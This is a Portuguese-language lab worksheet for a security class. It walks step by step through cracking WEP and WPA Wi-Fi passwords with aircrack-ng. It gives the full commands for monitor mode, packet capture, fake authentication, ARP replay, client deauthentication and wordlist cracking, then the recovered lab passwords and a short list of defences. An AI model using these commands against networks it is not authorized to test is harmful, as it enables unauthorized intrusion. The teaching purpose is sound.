Tiago Pasa Roteiro – Aircrack-ng Descrição Ferramenta utilizada para realizar ataques a senhas em redes sem fios. Objetivo Demonstrar a utilização do aircrack-ng para quebrar senhas de redes sem fio configuradas com criptografia WEP e WPA. Instalação A instalação é possível ser realizada em várias distribuições Linux, para simplificar será utilizada a distribuição BackTrack 5 R3 / Kali Linux que já possuem a ferramenta instalada. O link a seguir descreve o processo de instalação da ferramenta em diversos sistemas operacionais http://www.aircrack-ng.org/install.html Funcionalidades Capturar e descriptografar senhas wireless com vários tipos de criptografia. http://www.aircrack-ng.org/doku.php?id=pt-br:aircrack-ng Cenários com aplicação da ferramenta WEP – WPA http://www.aircrack-ng.org/doku.php?id=simple_wep_crack http://www.aircrack-ng.org/doku.php?id=cracking_wpa Laboratório Máquina física - Pendrive com boot do BackTrack 5 R3 / Kali Linux VMs com vmware player (bridge/ 512MB /1 core) - ISOs disponibilizadas no compartilhamento público (BT5R3-GNOME-32.iso / kali-linux-1.1.0a-i386.iso) Observação: Vamos realizar somente os passos dos tópicos em amarelo, as capturas WEP e WPA já foram realizadas e serão disponibilizadas no mussum abaixo. Comandos Listar interfaces Identificar interface wireless com comando “ iwconfig” Aircrack-ng - WEP Colocar interface wireless em modo de captura (Monitor) airmon-ng start wlan0 Após este comando cria automaticamente a interface “mon0” 1º Passo para começar a captura airodump-ng -w captura_wep -c 4 --bssid 00:1D:0F:F5:8D:E0 mon0 -w arquivo com dados da captura -c canal do access point --bssid mac address do access point mon0 interface em modo monitor 2º Realizar falsa autenticação no AP (abrir outro terminal) aireplay-ng -1 0 -a 00:1D:0F:F5:8D:E0 mon0 -1 autenticação falsa com AP 0 desautenticar 1 ou todas as estações -a mac address do access point mon0 interface em modo monitor 3º Gerar tráfego para captura (abrir outro terminal) aireplay-ng -3 -b 00:1D:0F:F5:8D:E0 mon0 -3 replay de ARP request -b mac address do access point mon0 interface em modo monitor Objetivo de gerar pacotes ARP na rede e acelerar o processo de captura até ter a quantidade necessária de IVs (Inicialization Vector) para realizar a descriptografia da senha. Após a captura de cerca de 20.000 IVs já é possível tentar realizar a quebra da senha com o aircrack-ng. 4º Descriptografar os dados obtidos no arquivo “captura_wep-01.cap” wget http://192.168.200.3/emmonks/seguranca4/Pratica3/alunos/wep-01.cap aircrack-ng captura_wep-01.cap Senha “REDES” Aircrack-ng – WPA airmon-ng start wlan0 Após este comando cria automaticamente a interface “mon0” 1º Passo para começar a captura airodump-ng -w captura_wpa -c 6 --bssid EA:94:F6:BD:5F:A4 mon0 -w arquivo com dados da captura -c canal do access point --bssid mac address do access point mon0 interface em modo monitor 2º Realizar desautenticação do cliente para capturar o handshake aireplay-ng -0 5 -a EA:94:F6:BD:5F:A4 mon0 0 desautenticar -50 desautenticação (realizada tentativa de 50 desautenticações) -a mac address do access point mon0 interface em modo monitor 3º Descriptografar os dados obtidos no arquivo “wpa-01.cap” wget http://192.168.200.3/emmonks/seguranca4/Pratica3/alunos/wpa-01.cap aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst wpa-01.cap Obs: No kali Linux é necessário baixar a wordlist “darkc0de”. wget http://192.168.200.3/emmonks/seguranca4/Pratica3/alunos/darkc0de.lst Senha “00ph0120541pin63c70m9” FORMAS DE MELHORAR A SEGURANÇA AOS ATAQUES WIRELESS Não utilizar criptografia com o protocolo WEP; Utilizar WPA2 (AES); Controle de acesso por mac address; Utilizar um servidor radius para autenticação; Utilizar um Captive Portal. Referências: • • • • Servidor Mussum Aircrack - http://www.aircrack-ng.org/ BackTrack - http://www.backtrack-linux.org/ Kali Linux - https://www.kali.org/
* Your assessment is very important for improving the work of artificial intelligence, which forms the content of this project
advertisement